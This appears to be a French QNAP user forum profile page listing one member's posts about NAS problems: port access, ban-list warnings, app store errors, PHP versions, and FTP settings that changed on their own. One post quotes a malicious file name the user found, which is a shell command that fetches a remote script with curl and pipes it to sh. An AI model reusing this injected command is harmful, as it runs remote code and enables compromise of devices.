Jump to content

cc66

Membres
  • Content Count

    56
  • Joined

  • Last visited

Community Reputation

0 Neutral

About cc66

  • Rank
    Qnapeur officiel

Profile Information

  • Gender
    Male
  • Matériel
    TS-421

Recent Profile Visitors

1,506 profile views
  1. Il semble que ma livebox a changée le port vers l’extérieur toute seule (?) et il est maintenant 8082: (il reste 8080 de l’intérieur) après une vérification dans l'administration de la freebox play. donc http://monsite.ddns.net:8082 de l’extérieur (par internet) on atteint bien le site d'administration du lan :il faut utiliser le port interieur 8080: d'un peripherique du LAN: de l’intérieur 192.168.1.17:8080 on atteint bien le site d'administration. un peu compliqué mais ça marche .
  2. Bonjour, Depuis quelque jours je ne peux accéder à la page de connexion classique d'administration mon NAS avec l'adresse qui marchait bien : http://monsite.ddns.net:8080 j'ai une page "Le délai d’attente est dépassé/Le serveur à l’adresse monsite.ddns.net met trop de temps à répondre." Pourtant je peux toujours y accéder avec https://q78910123.myqnapcloud.com/ : j’accède bien à la page bleu de connexion à l'administration classique de Qts avec les photos et j'ai bien dans le control panel du NAS : port system 8080 de plus cela marchait bien avant , il me semble que j'ai rien modifié (et même problème en changeant de navigateur ). quid, Pourquoi cela ne fonctionne plus ?
  3. oui, c’était bien ça et la modif du mot de passe dans le coffre Windows à réglé le problème. Encore merci pour votre aide cc66
  4. ok , merci de votre réponse, oui, c'est surement un truc comme cela. je regarde ça ce week-end et je noterais un retour positif lorsque je l'aurais 'réglé' . Encore merci pour votre aide cc66
  5. Bonjour les Qnapiens, Un petit problème depuis quelques jours: J'ai changé le mot de passe de l'admin du NAS et depuis cela, j'ai mon PC sous Windows qui veux accéder tout seul au Nas et qui se fait refouler (car il n'as pas ce nouveau mot de passe) comme il recommence plusieurs fois , le NAS le met dans la Ban-list au bout de 10 fois et pour 30mn : j'ai donc cet avertissement tous les jours à des heures differentes: Avertissement 28/10/2018 21:31:33 System 127.0.0.1 Security Level [Security] Added IP address: [192.168.1.23] to ban list. Duration of ban: for 30 minutes. pour explication 192.168.1.23 c'est l'IP de mon PC qui tente d'entrer en tant qu'admin. Je suppose qu'une appli avait l'ancien mot de passe et entrait sans problème avant . Donc ma question : Comment savoir quelle l'application du PC tente de rentrer ( a mon avis c'est SAMBA mais je suis pas certain ) et comment lui mettre le nouveau mot de passe après vérification et si autorisation ok ? @plus
  6. C'est revenu quelques minutes plus tard ... donc : Le NAS a pu récupérer la liste d'informations sur les applications....tout seul
  7. Dans l'AppCenter, il y a bien le Qnap Store avec le bouton "mes application" et le bouton "toutes les applications" Mes application sont bien visible mais lorsque je clique sur "toutes les applications" rien n'est visible et j'ai à la place : "Le NAS n'a pas pu récupérer la liste d'informations sur les applications. Veuillez vérifier vos paramètres" et je ne vois aucunes applications du Qnap store de cette section "toutes les applications"
  8. cc66

    port ftp 49832 ouvert tout seul ?

    je reste donc avec le FTP désactivé (cela semble couper court à toute velléité de hacking pour l'instant!)
  9. cc66

    port ftp 49832 ouvert tout seul ?

    Bon, il semble que je ne suis plus seul : même changement de port et un accès anonymous autorisé alors qu'il était coupé: voir sur ce forum : https://forum.qnap.com/viewtopic.php?t=143331
  10. cc66

    port ftp 49832 ouvert tout seul ?

    j'ai même trouvé un étrange fichier dans le dossier "Public" nommé bizarrement : null 2>&1 ) & ) ).mp3 dans une enfilade de répertoire qui ressemble plus à du code : voir ci après: $( ( ( PATH="$PATH":/usr/local/sbin:/usr/local/bin:/sbin:/bin; curl -vk -m 600 --connect-timeout 15 https:/q77759777.myqnapcloud.com/cgi-bin/fsqmUpXC.sh | sh/dev/null 2>&1 ) & ) ).mp3 avec ce q77759777.myqnapcloud.com qui est mon adresse sur qnapcloud . (note: j'ai modifié le code 77759777 c'est pas tout à fait celui là) Bizarre autant qu’étrange. j'ai coupé le ftp : au moins je suis rassuré
  11. cc66

    port ftp 49832 ouvert tout seul ?

    En essayant de me connecter normalement avant hier à mon ftp avec Filezilla (qui depuis toujours se connecte sur le port 21 parfaitement ) , cela est impossible ... je regarde la config de mon FTP sur QTS : le port ftp a été changé en port 49832 et la connexion anonyme est autorisée (ce que j'avais bloqué). bon je remet tout ça un peut dubitatif, mais aujourd'hui rebelote : le port est de nouveau 49832 et anonyme est autorisé ! (bizarre bizarre!) Qui modifie le port de mon QNAP : une application, un hackeur, moi sans le savoir ou un bug ? Quid? je m'interroge? ps: c'est étrange car j'ai trouvé un site chinois qui indique la même chose (traduit par google ) mais qui bien sûr ne donne pas de solution : https://translate.google.com/translate?hl=fr&sl=zh-TW&u=https://www.mobile01.com/topicdetail.php%3Ff%3D494%26t%3D5571512&prev=search
  12. bonjour, tout ce que je viens de dire ne sert à rien : apres quelques jours et un redemarrage : la version est revenue toute seule à 2.6.30 comme par magie (ou plutôt sorcellerie! ) le Qnap voit que cela cloche et remet tout seul l'ancienne version ... et nextcloud qui marchait se bloque et redemande la version supérieure grrrr! Y-a-t-il un moyen pour fixer la version 2.9.8 et eviter que le qnap ne l'écrase avec l'ancienne ? (peut etre en corrigeant l'erreur sur " error while loading shared libraries: libxml2.so.2 "
  13. ugh! , ben ça marche pas : c'est pas pour mon qnap de type : ts x31
  14. je me reponds a moi-même: https://www.qnapclub.eu/fr/qpkg/610 génial : php 7.2.8 Mais je suis pas certain que cela marche pour ma version de NAS... on verra bien (je vous en parle plus tard) (pour 1 eur 5 eur )
  15. Bonjour, Voilà, la question est simple, tout est dans le titre.... c'est pour mon owncloud : il lui faut php7 pour tourner rond ! En réalité je crois que le module PHP intl suffirait.
×